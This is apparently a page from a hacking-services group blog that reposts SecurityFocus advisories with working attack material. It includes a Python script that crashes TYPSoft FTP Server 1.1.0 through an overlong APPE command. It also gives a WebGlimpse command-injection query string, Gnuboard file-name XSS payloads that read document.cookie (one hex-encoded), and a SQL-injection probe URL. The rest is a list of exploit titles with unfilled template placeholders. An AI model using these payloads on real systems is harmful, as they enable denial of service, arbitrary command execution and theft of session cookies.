source: https://www.securityfocus.com/bid/52554/info
TYPSoft FTP Server is prone to a buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
TYPSoft FTP Server 1.1.0 is vulnerable; other versions may also be affected.
#!/usr/bin/python
import socket, sys
if len(sys.argv)!= 2:
print '\n\t[*] Usage: ./' + sys.argv[0] + ' <target host>'
sys.exit(1)
print '\n\t[*] TypesoftFTP Server 1.1 Remote DoS (APPE) by Brock Haun'
host = sys.argv[1]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = 'A../' + '\x41' *100
print '\n\t[*] Sending crash buffer ("A../ + \x41 * 100").'
s.connect((host,21))
data = s.recv(1024)
s.send('USER anonymous' + '\r\n')
data = s.recv(1024)
s.send('PASS anonymous' + '\r\n')
data = s.recv(1024)
s.send('APPE ' + buffer + '\r\n')
print '\n\t[*] Done! Target should be unresponsive!'
s.close()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863141449
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/52627/info
WebGlimpse is prone to a remote command-injection vulnerability.
Attackers can exploit this issue to execute arbitrary commands in the context of the application.
WebGlimpse versions prior to 20.20.0 are affected.
query=%27%26command+and+arguments+go+here%26%27
source: https://www.securityfocus.com/bid/52622/info
Gnuboard is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected website, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user.
Gnuboard versions prior to 4.34.21 are vulnerable.
1) you can upload a file (e.g. a.txt) to the BBS.
2) you can download it from the following scripts and figure out what's working on.
### vulnerable code #########################################################################################################################
javascript:file_download('./download.php?bo_table=test&wr_id=13&no=0&sca=&sfl=&stx=&sst=&sod=&spt=0&page=0', 'a.txt');
#############################################################################################################################################
3) you can also upload a file with name of XSS code. The following is the example.
- ');alert(document.cookie);//
- %27);alert(document.cookie);%2f%2f
- %27%29%3b%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%2f%2f
### vulnerable code #########################################################################################################################
javascript:file_download('./download.php?bo_table=test&wr_id=13&no=0&sca=&sfl=&stx=&sst=&sod=&spt=0&page=0', '');alert(document.cookie);//');
#############################################################################################################################################
4) The example file works by pulling in the Javascript and running it as part of the Javascript.
source: https://www.securityfocus.com/bid/52637/info
Vacation Packages is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://wwww.example.com/vacation-packages/demo.php?controller=Listings&action=search&listing_search=1&season=2'

WebGlimpse 2.x - 'wgarcmin.cgi' Full Path Disclosure
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

VideoCharge Express 3.16.3.04 - Local Buffer Overflow
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

VideoCharge Vanilla 3.16.4.06 - Local Buffer Overflow
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Pluck CMS 4.7 - Directory Traversal
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

eFront 3.6.15 - PHP Object Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

SQLBuddy 1.3.3 - Directory Traversal
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

WebGlimpse 2.18.7 - 'DOC' Directory Traversal
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

F5 FirePass 7.0 - SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

CreateVision CMS - 'id' SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

ZTE F660 - Remote Configuration Download
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

i.FTP 2.21 - Time Field (SEH)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

eFront 3.6.15 - Multiple SQL Injections
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

eFront 3.6.15 - Directory Traversal
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Wing FTP Server Admin 4.4.5 - Cross-Site Request Forgery (Add User)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

SixApart MovableType - Storable Perl Code Execution (Metasploit)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

CMSimple 3.3 - 'index.php' Cross-Site Scripting
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view